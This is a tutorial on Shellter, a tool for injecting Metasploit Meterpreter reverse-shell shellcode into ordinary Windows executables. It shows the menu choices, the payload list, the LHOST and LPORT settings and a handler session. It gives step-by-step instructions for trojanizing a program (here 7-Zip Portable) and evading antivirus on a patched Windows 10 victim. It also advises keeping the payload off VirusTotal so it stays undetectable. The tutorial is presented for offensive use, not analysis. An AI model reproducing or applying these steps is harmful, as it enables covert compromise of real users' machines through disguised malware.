Shellter – The ultimate tool for AV evasion
Shellter Website - https://www.shellterproject.com/
Attacker: Kali Linux
Victim: Windows 10 (fully patched, fully updated antivirus)
Introduction
Shellter is a tool for injecting dynamic shellcode into win32 exe’s. The shellcode can be yours, or something you generate via a 3rd party framework such as Metasploit.
Shellter preserves the original structure of the target executable and can be used in either Automatic or Manual mode. It can also be used to create encoded/self-decrypting payloads.
In this tutorial, we will cover the automatic mode of operation.
Installation
You can either download and install Shellter from the Shellter Website or install using apt-get in Kali:
Payload Creation
Start shellter and select [A] for automatic mode, then select your target .exe file.
Choose Operation Mode - Auto/Manual (A/M/H):
PE Target:
On the payload menu, select [L] then [1] for MeterpreterReverseTCP.
Enter your IP address and port you wish to use the payload on.
Note: If you select Stealth Mode, you must set [exitfunc] to [thread] in Metasploit.
* Payloads *
************
[1] Meterpreter_Reverse_TCP
[2] Meterpreter_Reverse_HTTP
[3] Meterpreter_Reverse_HTTPS
[4] Meterpreter_Bind_TCP
[5] Shell_Reverse_TCP
[6] Shell_Bind_TCP
[7] WinExec
Use a listed payload or custom? (L/C/H):
Select payload by index:
SET LHOST:
SET LPORT:
Shellter will now encode and obfuscate the payload.
When the process is complete, hit [Enter] to exit.
At this point you can either use the checkvt script from Veil Evasion (https://www.veil-framework.com/how-to-safely-check-veil-payloads-against-virustotal/) or Mubix’s vt-notify script (https://github.com/mubix/vt-notify) to safely check the payload against Virus Total. Alternatively, use the virus scanner of your target system to confirm the payload is undetectable. DO NOT upload your exe to Virus Total.
Exploitation
msf >
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) >
Run the payload on your Victim machine
Back in Kali, a Meterpreter session will open and you now have a reverse shell to your victim Windows 10 machine.
meterpreter >
Process 3788 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\7-ZipPortable>
Tags: av-evasion